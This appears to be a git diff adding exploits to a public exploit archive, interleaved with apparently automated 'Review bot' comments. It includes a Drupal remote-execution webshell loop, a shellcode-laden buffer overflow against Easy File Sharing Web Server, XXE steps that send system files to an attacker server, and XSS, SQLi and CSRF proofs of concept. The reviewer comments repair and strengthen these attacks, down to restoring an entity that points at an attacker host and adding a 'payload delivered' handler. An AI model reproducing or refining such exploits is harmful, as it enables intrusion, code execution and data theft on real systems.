+ # Send request
+ result = http_post("#{$target}#{webshell}", "c=#{command}").body
+ # Direct commands
+ else
+ url, payload = gen_evil_url(command, false)
+ response = http_post(url, payload)
+ if response.code == "200" and not response.body.empty?
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ end
+ end
+
+ # Feedback
+ puts result
+end
\ No newline at end of file
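Review bot: Line 513 interpolates a bare `target`, but the only variable now defined is `$target` (line 508), so an argument given without a scheme raises NameError instead of having `http://` prepended; it should read `$target = "http://#{$target}"`. Line 601 has the mirror-image slip: the warning interpolates `url`, the whole candidate array, where the block parameter `uri` is meant. On line 751, `command =~ /exit/` ends the session for any input that merely contains that substring, and because `trap("INT", "SIG_IGN")` on line 739 disables Ctrl+C it is the only way out of the loop, so it should be exact: `break if command.strip == "exit"`. `http_post` (lines 445–451) rescues no network exceptions, so a refused connection surfaces as a backtrace rather than the `[!]` style message used everywhere else; `$drupalverion` is also misspelled throughout, which matters a little more than usual because it is a global shared with `gen_evil_url`.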
diff --git a/exploits/php/webapps/44483.txt b/exploits/php/webapps/44483.txt
new file mode 100644
index 000000000..9719a5d12
--- /dev/null
+++ b/exploits/php/webapps/44483.txt
@@ -0,0 +1,24 @@
+# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
+# Date: 14-13-2018
+# Software Link: https://sourceforge.net/projects/mysar/
+# Exploit Author: Keerati T.
+# Version: 2.1.4
+# Tested on: Linux
+
+1. Description
+SQL injection and Cross site script vulnerabilities are found on ALL
+parameter of MySAR.
+
+2. Proof of Concept
+FOR EXAMPLE
+- SQL injection
+http://server/mysar/index.php?a=IPSummary&date=[SQLi]
+-XSS
+http://server/mysar/index.php?a=IPSummary&date=2018-04-14
+">
+
+3. Timeline
+8-3-2018 - Report on their Github. (
+https://github.com/coffnix/mysar-ng/issues/12)
+-- 1 month later, no any response from vendor. --
+14-4-2018 - Public.
\ No newline at end of file
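Review bot: The `# Date:` header on line 780 reads `14-13-2018`, which is not a valid date; the timeline on line 802 gives `14-4-2018 - Public`, so presumably `14-04-2018` was intended. The header also lacks the `# Vendor Homepage:` and `# CVE:` lines that the other advisories in this commit carry, and the claim on lines 787–788 that "ALL parameter" are affected is backed by a single `date=` example, so either more parameters should be listed or the wording narrowed to what was tested.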
diff --git a/exploits/php/webapps/44484.txt b/exploits/php/webapps/44484.txt
new file mode 100644
index 000000000..c4b1f3467
--- /dev/null
+++ b/exploits/php/webapps/44484.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Rvsitebuilder CMS Database Backup Download
+# Exploit Author: Hesam Bazvand
+# Contact: black.king066@gmail.com
+# Software Link: http://www.rvsitebuilder.com
+# Version: All Version
+# Tested on: Windows 7 / Kali Linux
+# Category: WebApps
+# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login
+
+*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
+
+Exploit :
+ Http://Target/rvsDbBackup.sql
\ No newline at end of file
diff --git a/exploits/php/webapps/44486.txt b/exploits/php/webapps/44486.txt
new file mode 100644
index 000000000..18a84dbbe
--- /dev/null
+++ b/exploits/php/webapps/44486.txt
@@ -0,0 +1,28 @@
+########################################################################
+# Exploit Title: Match Clone Script 1.0.4 - Cross-Site Scripting
+# Date: 23.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/match-clone/
+# Category: Web Application
+# Exploit Author: ManhNho
+# Version: 1.0.4
+# Tested on: Window 10 / Kali Linux
+# CVE: CVE-2018-9857
+##########################################################################
+Description
+------------------------
+PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to
+searchbyid.php (aka the "View Search By Id" screen).
+
+Proof of Concept
+------------------------
+1. Access to site
+2. Choose “Search”
+3. Choose "View Search By Id"
+3. Put in search field
+4. You will be having a popup: ManhNho
+
+References:
+------------------------
+https://pastebin.com/Y9uEC4nu
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9857
\ No newline at end of file
diff --git a/exploits/php/webapps/44489.txt b/exploits/php/webapps/44489.txt
new file mode 100644
index 000000000..b64ed4969
--- /dev/null
+++ b/exploits/php/webapps/44489.txt
@@ -0,0 +1,159 @@
+# Exploit Title: CalderaForms 1.5.9.1 - multiple XSS
+# Date: 02-03-2018
+# Exploit Author: Federico Scalco
+# fscalco at mentat dot is
+# @mindpr00f
+# Vendor Homepage: https://calderaforms.com/
+# Software Link: https://wordpress.org/plugins/caldera-forms/
+# Vulnerable App: https://github.com/CalderaWP/Caldera-Forms/archive/1.5.9.1.zip
+# Version: 1.5.9.1 (older versions may also be affected)
+# Tested on: WordPress 4.9.4
+# CVE : CVE-2018-7747
+
+
+
+1) SOFTWARE DESCRIPTION
+"Caldera Form is a free and powerful WordPress plugin that creates
+responsive forms with a simple drag and drop editor."
+It is reported to have 100,000+ active installations at the moment of this
+writing.
+
+
+
+2) VULNERABILITY OVERVIEW
+The application fails to validate user-supplied input, hence it stores the
+unsanitized buffer in the database.
+The vulnerabilities reported here will be exploitable ONLY if certain
+conditions are met, which is not the case in a CF's default configuration
+(although still being vulnerable).
+
+A note on buffers containing strings:
+ single (') and double (") quotes are correctly escaped, backticks (`)
+are not.
+
+
+
+3) DETAILS
+
+3.a) Stored XSS - public
+When submitting a CF form, the plugin will show a greeting message to
+notify the user that everything went ok.
+This message is editable by the site's admin and can contain part of the
+user-supplied data (e.g. they're first name). In this case, simply inject
+HTML code into the parameter which gets returned in the greeting message
+and submit the POST request. A JSON response will follow, containing, among
+other data:
+- the greeting message ("html", which contains the malicious payload that
+gets executed right away)
+- form's ID ("form_id")
+- data's ID ("cf_id")
+
+{
+ "data":{"cf_id":""},
+ "html":"",
+ "type":"...",
+ "form_id":"",
+ "form_name":"...",
+ "status":"..."
+}
+
+At this point, to reach the stored XSS, simply build a GET request using
+the obtained data.
+The malicious payload will be found at
+
+ http(s):///cf-api//?cf_su=1&cf_id=
+
+Vulnerable config:
+ - form > form settings > capture entries > checked (ON by default)
+ - form > form settings > success message > add some of the user
+supplied fields (absent by default)
+
+To replicate this on a fresh install:
+ - Create a new, default, contact form
+ - Go to "Form Settings" tab and edit the success message to include,
+for example, the user's first name.
+e.g.: Form has been successfully submitted. Thank you %first_name%.
+ - Save & publish
+ - As an unauthenticated user, submit the contact form injecting HTML
+code in first name's parameter. XSS will be triggered right away
+ - To recall the payload as a stored XSS, read the POST's response and
+point your browser to
+ /cf-api//?cf_su=1&cf_id=
+
+
+
+3.b) Stored XSS - admin interface
+CalderaForms gives the ability to notify the admin via email everytime a
+form gets submitted.
+Furthermore, an admin can choose to enable an "email transacion log" for
+debugging purposes (disabled by default).
+If this configuration is in place, a copy of the malicious payload
+described above will be shown in the administration panel, when visiting
+that form's malicious entry's details.
+
+Vulnerable config:
+ - form > form settings > capture entries > checked (ON by default)
+ - form > email > debug mailer > checked (OFF by default)
+
+To replicate this on a fresh install:
+ - Enable the transaction log (form -> edit -> email tab -> check
+"Enable email send transaction log")
+ - Replicate the injection described at 3.a (all fields can be used this
+time) as an unauthenticated user
+ - Back again in the admin interface, visit form's entries, identify the
+malicious one and click on the "view" button
+
+ This will pop a details window and trigger the XSS.
+
+
+
+3.c) Importing a weaponized form - admin interface
+CalderaForms gives the ability to import a form (JSON format).
+A malicious form field can be crafted which will trigger an XSS when said
+field gets displayed/edited after the import.
+
+It's worth noting that this flaw does not depend on custom configurations,
+although it's not "remotely" and "automatically" exploitable. The problem
+here arise, for example, when an admin imports a malicious JSON.
+
+To replicate this on a fresh install:
+ - Create a form and export it (JSON format)
+ - Edit the json and inject HTML code. "label" and "slug" parameters
+were tested, others may be vulnerable too.
+ e.g.:
+ {
+ ...
+ "label":"First Name",
+ "slug":"first_name\"/>"
+ ...
+ }
+
+ - Import the malicious form to trigger the XSS in the administration
+interface
+
+
+
+4) REMEDIATION
+Update to the latest version available.
+
+If any personalized configuration is found exploitable, the following steps
+can be followed, as a temporary mitigation strategy, if no update is
+available or updating is not an option, for whatever reason:
+ - for every form, under "Form Settings", prune every variable that gets
+returned to the user as a success message
+ - for every form, under the "Email" tab, un-check "Enable email send
+transaction log"
+ - for every form that gets imported perform a thorough review
+
+
+
+5) TIMELINE & FINAL NOTES
+
+ 02-03-18 > vendor gets notified
+ 06-03-18 > vendor replies
+ 07-03-18 > CVE requested and assigned
+ 27-03-18 > patch released
+ 27-03-18 > vulnerability disclosed
+
+Special thanks go to Josh Pollock and his team, from Caldera, who invested
+passion and energy in understanding and patching these issues.
\ No newline at end of file
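Review bot: The recall URL in section 3.a, `http(s):///cf-api//?cf_su=1&cf_id=`, has lost its placeholders — host, form ID and entry ID are all empty, as are the `cf_id`, `html` and `form_id` values in the sample JSON above it — so the stored-XSS step is not reproducible from the text. Rewrite it as `http(s)://<site>/cf-api/<form_id>/?cf_su=1&cf_id=<cf_id>`, taking `form_id` and `cf_id` from the POST response as the prose already says, and put a concrete payload into the JSON sample (`"html":"...<img src=x onerror=alert(1)>..."`) so the reader sees which field carries it. Section 4 says only 'update to the latest version'; the timeline records a patch on 27-03-18, so naming the fixed release lets operators verify they are covered. The note in section 2 that backticks are not escaped is the actionable detail for testing — it is worth saying outright that a backtick-delimited payload is the one to try when quotes are escaped.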
diff --git a/exploits/php/webapps/44492.txt b/exploits/php/webapps/44492.txt
new file mode 100644
index 000000000..85860053c
--- /dev/null
+++ b/exploits/php/webapps/44492.txt
@@ -0,0 +1,68 @@
+#######################################
+# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities
+# Google Dork: N/A
+# Date: 17-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni#
+#######################################
+# Author Blog : http://nullnews.in
+# Vendor Homepage: https://www.joomsky.com
+# Software Link: https://extensions.joomla.org/extension/js-jobs/
+# Affected Version: 1.2.0
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : NA
+#######################################
+
+1. Vendor Description:
+
+JS Jobs for any business, industry body or staffing company wishing to
+establish a presence on the internet. JS Jobs allows you to run your own,
+unique jobs classifieds service where you or employer can advertise their
+jobs and job seekers can upload their Resumes.
+
+2. Technical Description:
+
+The state changing actions in JS Jobs before 1.2.1 not having any random
+token validation which results in Cross Site Request Forgery Vulnerability.
+
+3. Proof of Concept:
+
+Delete Job Entry [Super Admin Access]
+
+
+
+
+
+
+
+
+4. Solution:
+
+Update to latest version
+
+https://extensions.joomla.org/extension/js-jobs/
\ No newline at end of file
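Review bot: The Proof of Concept under `Delete Job Entry [Super Admin Access]` is empty — the HTML form that exercises the CSRF is missing, so the advisory gives neither the target URL (for a Joomla component, typically an `index.php?option=com_jsjobs&task=...` request) nor the parameters needed to confirm the absent token check; it was presumably stripped as markup and should be restored as an indented block. Section 2 says the flaw is present `before 1.2.1`, so the Solution should name 1.2.1 as the fixed release rather than 'latest version'. It would also help to state which other state-changing actions were verified, since the title says 'Multiple' but only one is listed.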
diff --git a/exploits/windows/dos/44494.py b/exploits/windows/dos/44494.py
new file mode 100755
index 000000000..afc110c3e
--- /dev/null
+++ b/exploits/windows/dos/44494.py
@@ -0,0 +1,23 @@
+#!/usr/bin/python
+# Title: VX Search 10.6.18 Local Buffer Overflow
+# Author: Kevin McGuigan
+# Twitter: @_h3xagram
+# Author Website: https://www.7elements.co.uk
+# Vendor Website: http://www.vxsearch.com
+# Version: 10.6.18
+# Date: 18/04/2018
+# Tested on: Windows 7 32-bit
+# Vendor did not respond to advisory.
+
+# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field.
+
+filename="vxsearchPOC.txt"
+junk = "A"*271
+#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll)
+#eip="\x1a\x2a\x2c\x65"
+eip = "B" * 4
+fill = "C" *900
+buffer = junk + eip + fill
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
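Review bot: The PoC file is opened in text mode (`open(filename , 'w')`) and closed by hand; on Windows text mode rewrites any 0x0a byte as 0x0d 0x0a, which is harmless for the current A/B/C filler but will silently corrupt the buffer as soon as a real gadget or shellcode containing a newline byte is wired in. Use binary mode and a context manager: `with open(filename, 'wb') as textfile:` / `    textfile.write(buffer)`. The header should also say this is a crash-only PoC (EIP is overwritten with `0x42424242`) so readers do not expect the commented `0x652c2a1a` gadget to be active — and, if it is enabled later, that it comes from a non-rebased QtGui4.dll and is therefore tied to that installed build (v4.3.4.0).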
diff --git a/exploits/windows/remote/44485.py b/exploits/windows/remote/44485.py
new file mode 100755
index 000000000..e0fe1aa14
--- /dev/null
+++ b/exploits/windows/remote/44485.py
@@ -0,0 +1,67 @@
+# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
+# Date: 03/24/2018
+# Exploit Author: rebeyond - http://www.rebeyond.net
+# Vendor Homepage: http://www.sharing-file.com/
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Version: 7.2
+# CVE: CVE-2018-9059
+# Tested on: Windows XP Professional SP3
+#
+# Description:
+# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned
+#
+#
+# The stack trace is as follows:
+# (40d8.2980): Access violation - code c0000005 (first chance)
+# r
+# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
+# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
+# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
+# sqlite3!sqlite3_errcode+0x8e:
+# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
+#
+# kb
+# ChildEBP RetAddr Args to Child
+# WARNING: Stack unwind information not available. Following frames may be wrong.
+# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
+# *** WARNING: Unable to verify checksum for fsws.exe
+# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
+# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
+# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
+# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3
+
+
+import requests
+host='192.168.50.30'
+port='80'
+
+buf='A'*4071
+buf +='\x12\x45\xfa\x7f' #jmp esp
+buf +='A'*12
+buf +='\xeb\x36' #jmp 0x36
+buf +='A'*42
+buf +='\x60\x30\xc7\x61'*2 #must be valid address
+buf +='A'*4
+#shellcode to execute calc.exe on remote server
+buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33"
+buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45"
+buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2"
+buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf"
+buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93"
+buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9"
+buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58"
+buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a"
+buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe"
+buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66"
+buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd"
+buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43"
+buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9"
+buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d"
+buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19"
+buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6"
+buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88"
+
+cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')
+data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
+requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
\ No newline at end of file
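Review bot: The `requests.post(...)` on the last line has no timeout and no error handling, so once the overflow fires and the server stops answering (the trace above shows it faulting in `sqlite3!sqlite3_errcode`) the script simply hangs instead of reporting that the payload was delivered. Add a `timeout=` and treat a timeout or connection reset as the expected outcome; `host`/`port` are also better taken from the command line than hard-coded. The return address `\x12\x45\xfa\x7f` (0x7ffa4512) looks like the well-known fixed `jmp esp` gadget that existed only on Windows XP/2003-era builds, consistent with `Tested on: Windows XP Professional SP3`, and the `\x60\x30\xc7\x61` addresses sit inside the sqlite3.dll base shown in the trace — the header should say explicitly that the exploit is tied to that OS and module version.

```python
# … unchanged: buf construction and shellcode …
cookies = dict(SESSIONID='6771', UserID=buf, PassWD='')
data = dict(frmLogin='', frmUserName='', frmUserPass='', login='')
try:
    requests.post('http://' + host + ':' + port + '/forum.ghp',
                  cookies=cookies, data=data, timeout=5)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
    # the overflowed server does not answer; a timeout/reset here is the expected outcome
    print('[*] no response from server (%s) - payload delivered' % e)
```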
diff --git a/exploits/xml/webapps/44493.txt b/exploits/xml/webapps/44493.txt
new file mode 100644
index 000000000..e15eca059
--- /dev/null
+++ b/exploits/xml/webapps/44493.txt
@@ -0,0 +1,97 @@
+# Exploit Author: bzyo
+# CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079
+# Twitter: @bzyo_
+# Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
+# Date: 04-17-18
+# Vulnerable Software: WatchDog Console - 3.2.2
+# Vendor Homepage: http://www.itwatchdogs.com/
+# Version: 3.2.2
+# Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe
+# Tested On: Windows 7 x86
+
+Description
+-----------------------------------------------------------------
+WatchDog Console suffers from multiple vulnerabilities:
+
+# CVE-2018-10077 Authenticated XML External Entity (XXE)
+# CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS)
+# CVE-2018-10079 Insecure File Permissions
+
+Prerequisites
+-----------------------------------------------------------------
+To successfully exploit these vulnerabilities, an attacker must already have access
+to a system running WatchDog Console using a low-privileged user account
+
+Proof of Concepts
+-----------------------------------------------------------------
+### CVE-2018-10079 Insecure File Permissions ###
+By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and
+gives 'Authenticated Users' group Modify permissions
+
+C:\>icacls "c:\ProgramData\WatchDog Console"
+c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC)
+
+This allows any local user of the system the ability to reset the application admin password by generating
+a password using the PHP md5() function and updating the config.xml file. It also provides the ability to
+add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface
+
+### CVE-2018-10077 Authenticated XML External Entity (XXE) ###
+With authenticated admin access to the application or local access to the system, a user has the ability to read
+system files remotely through XXE
+
+On attacking machine
+- Create data.xml with following contents in apache root and start apache listening on 80
+
+
+
+ %sp;
+ %param1;
+ ]>
+ &exfil;
+
+- Create evil.xml with the following contents anywhere
+
+
+ ">
+
+- Start python simple http server in same directory as evil.xml, listening on 8080
+ python -m SimpleHTTPServer 8080
+
+On victim machine (1 of 2 ways)
+1. With admin access to application console, add attacking server IP address under servers tab
+or
+2. With local access to system
+ - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
+
+
+
+
+ - restart system
+
+On attacking machine
+- Contents of 'win.ini' is outputted to console
+- evil.xml can be updated to read other sensitive files (tested reading file from admin desktop)
+
+### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ###
+This application suffers from authenticated XSS on several inputs (1 of 2 ways)
+1. With admin access to application console, under servers tab
+ - add dummy IP in server name filed
+ - add "> into server description
+or
+2. With local access to system
+ - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
+
+
+ " selEmail="True" Username="1" Password="1" left="400" top="180" />
+
+ - restart system
+
+3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot.
+
+Timeline
+---------------------------------------------------------------------
+04-14-18: Vendor notified of vulnerabilities
+04-16-18: Vendor responded "Thank you for bringing this to our attention. The product has now been End-of-life for
+several years and is no longer receiving updates."
+04-17-18: Submitted public disclosure
\ No newline at end of file
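Review bot: The sentence ending `for both CVE-2018-10078 and CVE-2018-10079 or through the application interface` cites the wrong pair: CVE-2018-10079 is the file-permissions issue being described in that very paragraph, and the two attacks that writing servers.xml enables are the XXE (CVE-2018-10077) and the stored XSS (CVE-2018-10078) — it should read `...for both CVE-2018-10077 and CVE-2018-10078...`. The payloads are also incomplete as shown: the `data.xml` block has only `%sp;`, `%param1;`, `]>` and `&exfil;` with the `<!DOCTYPE`/`<!ENTITY` declarations missing, `evil.xml` is reduced to a dangling `">`, and both servers.xml snippets have lost their `<server ...>` element, so neither PoC can be reproduced from the text. The markup appears to have been stripped and should be restored, e.g. an `<!ENTITY % sp SYSTEM "http://<attacker>:8080/evil.xml">` declaration together with the parameter entity for `win.ini` it references, and the XSS snippet's opening `<server ... description="` with the injected value in front of `" selEmail="True"`.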
diff --git a/files_exploits.csv b/files_exploits.csv
index b411eb0c0..6487d1450 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5938,6 +5938,9 @@ id,file,description,date,author,type,platform,port
44466,exploits/windows/dos/44466.txt,"Microsoft Windows - 'CiSetFileCache' TOCTOU Incomplete Fix",2018-04-16,"Google Security Research",dos,windows,
44467,exploits/windows/dos/44467.txt,"Microsoft Edge - 'OpenProcess()' ACG Bypass",2018-04-16,"Google Security Research",dos,windows,
44468,exploits/windows/dos/44468.py,"Zortam MP3 Media Studio 23.45 - Local Buffer Overflow (SEH)",2018-04-16,"Kevin McGuigan",dos,windows,
+44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux,
+44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
+44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16413,7 +16416,8 @@ id,file,description,date,author,type,platform,port
44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
-44482,exploits/php/remote/44482.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
+44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
+44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39095,6 +39099,7 @@ id,file,description,date,author,type,platform,port
44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,
44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware,
44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php,
+44320,exploits/hardware/webapps/44320.txt,"Coship RT3052 Wireless Router - Persistent Cross-Site Scripting",2018-03-20,"Sayan Chatterjee",webapps,hardware,
44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,
44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
44346,exploits/php/webapps/44346.rb,"ClipBucket - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php,
@@ -39169,7 +39174,15 @@ id,file,description,date,author,type,platform,port
44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
-44449,exploits/php/webapps/44449.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
+44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
+44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80
+44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php,
+44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80
+44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,
+44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware,
+44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80
+44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
+44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,